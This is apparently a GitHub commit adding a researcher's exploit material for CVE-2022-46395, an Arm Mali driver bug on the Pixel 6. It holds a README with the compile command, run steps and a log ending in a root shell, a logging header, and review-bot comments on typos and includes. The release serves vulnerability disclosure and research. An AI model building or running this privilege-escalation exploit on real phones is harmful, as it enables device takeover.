Commit 0b6ff51

Merge pull request #760 from github/mali_46395
Blog material
2 parents 2c4ff61 + 319b5ad commit 0b6ff51

10 files changed: +3542 -0 lines changed

Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
## Exploit for CVE-2022-46395
2+
3+
The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
9+
```
10+
11+
The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root.
12+
13+
```
14+
oriole:/ $ /data/local/tmp/mali_user_buf
15+
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
16+
benchmark_time 357
17+
failed after 100
18+
failed after 200
19+
failed after 300
20+
benchmark_time 343
21+
failed after 400
22+
failed after 500
23+
failed after 600
24+
benchmark_time 337
25+
failed after 700
26+
failed after 800
27+
failed after 900
28+
benchmark_time 334
29+
failed after 1000
30+
failed after 1100
31+
failed after 1200
32+
benchmark_time 363
33+
failed after 1300
34+
finished reset: 190027720 fault: 135735849 772 err 0 read 3
35+
found pgd at page 4
36+
overwrite addr : 76f6100710 710
37+
overwrite addr : 76f5f00710 710
38+
overwrite addr : 76f6100710 710
39+
overwrite addr : 76f5f00710 710
40+
overwrite addr : 76f5d00710 710
41+
overwrite addr : 76f5b00710 710
42+
overwrite addr : 76f5d00710 710
43+
overwrite addr : 76f5b00710 710
44+
overwrite addr : 76f6100fd4 fd4
45+
overwrite addr : 76f5f00fd4 fd4
46+
overwrite addr : 76f6100fd4 fd4
47+
overwrite addr : 76f5f00fd4 fd4
48+
overwrite addr : 76f5d00fd4 fd4
49+
overwrite addr : 76f5b00fd4 fd4
50+
overwrite addr : 76f5d00fd4 fd4
51+
overwrite addr : 76f5b00fd4 fd4
52+
result 50
53+
oriole:/ #
54+
```
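Review bot: the README prose in this hunk carries two typos that should be corrected before it goes out as blog material: `Novmember 2022 and January 2023 patch` should read `November 2022 and January 2023 patch`, and `the exploit as a whole rare crashes` should read `the exploit as a whole rarely crashes`. The text also states only the patch levels the exploit was tested against; a sentence naming the driver or security-patch level at which the bug is fixed would let readers use it as an affected-versions statement rather than only as a test report.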
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
#ifndef LOG_UTILS_H
2+
#define LOG_UTILS_H
3+
4+
#ifdef SHELL
5+
#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6+
#else
7+
#include <android/log.h>
8+
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9+
#endif
10+
11+
#endif
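Review bot: the `SHELL` branch defines `LOG` in terms of `printf` but this header never includes `<stdio.h>`, so a translation unit that includes the header before `<stdio.h>` only compiles because of the include order in the calling files; add `#include <stdio.h>` beside the `#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)` line, mirroring the `#include <android/log.h>` in the `#else` branch. Also worth a short comment: `##__VA_ARGS__` is a GNU/Clang extension rather than standard C, which is fine for the NDK clang build the README describes but will not port to a strict C compiler.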
